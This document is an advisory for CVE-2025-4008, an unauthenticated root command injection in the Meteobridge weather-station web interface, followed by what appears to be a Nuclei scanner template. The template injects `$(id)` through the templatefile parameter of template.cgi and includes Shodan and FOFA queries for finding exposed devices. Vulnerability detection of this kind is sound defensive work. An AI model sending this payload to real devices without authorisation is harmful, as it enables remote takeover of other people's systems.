The Meteobridge web interface lets Meteobridge administrators manage their weather station data collection and administer their Meteobridge system through a web application written in CGI shell scripts and C. This web interface exposes an endpoint that is vulnerable to command injection. Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges (root) on affected devices.
PoC code [publicly available]
id: CVE-2025-4008

info:
  name: MeteoBridge <= 6.1 - Remote Code Execution
  author: iamnoooob,pdresearch
  severity: high
  description: |
    The Meteobridge web interface let meteobridge administrator manage their weather station data collection and administer their meteobridge system through a web application written in CGI shell scripts and C.This web interface exposes an endpoint that is vulnerable to command injection.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.
  reference:
    - https://forum.meteohub.de/viewtopic.php?t=18687
    - https://www.onekey.com/resource/security-advisory-remote-command-execution-on-smartbedded-meteobridge-cve-2025-4008
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4008
  classification:
    cve-id: CVE-2025-4008
    cvss-score: 7.5
    cwe-id: CWE-77
    epss-score: 0.03526
    epss-percentile: 0.872
  metadata:
    verified: true
    shodan-query: "meteobridge"
    fofa-query: "Meteobridge"
  tags: cve,cve2025,meteobridge,rce

http:
  - raw:
      - |
        GET /public/template.cgi?templatefile=$(id) HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Error: template file'
          - 'uid='
          - 'gid='
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f61962192fccdd2a0d160ff2fdab689d325995aa17ae82c0710ea5e9f8e52dbd022100e07dc2ca8101bec72bf11032b669dfa3766e962a83413df1b9738dccdf27f3a4:922c64590222798bb761d5b6d8e72950